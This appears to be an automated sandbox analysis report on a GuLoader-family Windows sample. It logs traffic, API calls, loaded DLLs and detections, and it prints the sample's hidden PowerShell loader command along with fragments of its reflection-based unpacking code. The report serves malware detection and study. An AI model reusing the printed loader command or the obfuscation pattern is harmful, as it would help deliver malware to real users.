      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49917 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:49923 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49967 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49995 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50000 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50015 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50017 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50023 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50025 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50027 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50028 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50029 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50033 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50035 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50039 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50041 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50043 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50048 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.6:50049 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.6:50054 version: TLS 1.2
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exeJump to dropped file
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_00404C7B0_2_00404C7B
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0476DFE02_2_0476DFE0
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0719CC662_2_0719CC66
      Source: You7ynHizy.exeStatic PE information: invalid certificate
      Source: You7ynHizy.exe, 00000000.00000000.2129718746.00000000007D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exeBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exe.2.drBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs You7ynHizy.exe
      Source: You7ynHizy.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@6/12@2/2
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
      Source: C:\Users\user\Desktop\You7ynHizy.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
      Source: C:\Users\user\Desktop\You7ynHizy.exeFile created: C:\Users\user\AppData\Local\downrangeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
      Source: C:\Users\user\Desktop\You7ynHizy.exeFile created: C:\Users\user\AppData\Local\Temp\nst46C3.tmpJump to behavior
      Source: You7ynHizy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\You7ynHizy.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: You7ynHizy.exeVirustotal: Detection: 65%
      Source: You7ynHizy.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\You7ynHizy.exeFile read: C:\Users\user\Desktop\You7ynHizy.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\You7ynHizy.exe "C:\Users\user\Desktop\You7ynHizy.exe"
      Source: C:\Users\user\Desktop\You7ynHizy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
      Source: C:\Users\user\Desktop\You7ynHizy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\You7ynHizy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: You7ynHizy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2522365385.00000000081C3000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb7 source: powershell.exe, 00000002.00000002.2511053317.0000000002BC9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.2516957835.0000000007092000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Phlogogenous $Pictography $outfacing), (Porser @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sondre = [AppDomain]::CurrentDomain.GetAssemblies()$global:S
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Danseskolen)), $Polering).DefineDynamicModule($boligformaalet, $false).DefineType($Institutraads, $Diskusprolapsernes, [System.Multica
      Suspicious powershell command line found
      Source: C:\Users\user\Desktop\You7ynHizy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
      Source: C:\Users\user\Desktop\You7ynHizy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0476CE82 push eax; mov dword ptr [esp], edx2_2_0476CE94
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0719B644 push 8B6BF5BAh; iretd 2_2_0719B649
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0719F926 push ss; iretd 2_2_0719F927
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F841A1 push 3B634E4Eh; ret 2_2_08F841AD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08F84548 push 8BD38B50h; iretd 2_2_08F8454E
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04464ADD push es; ret 8_2_04464AE0
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04460A8E push esp; iretd 8_2_04460A91
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04463C95 push edx; iretd 8_2_04463C96
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04466B5D push esp; retf 8_2_04466B5E
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_04465F77 push ebx; retf 8_2_04465F7B
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044641D1 pushfd ; retf 8_2_044641D4
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_044647ED push esi; ret 8_2_044647EE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\You7ynHizy.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
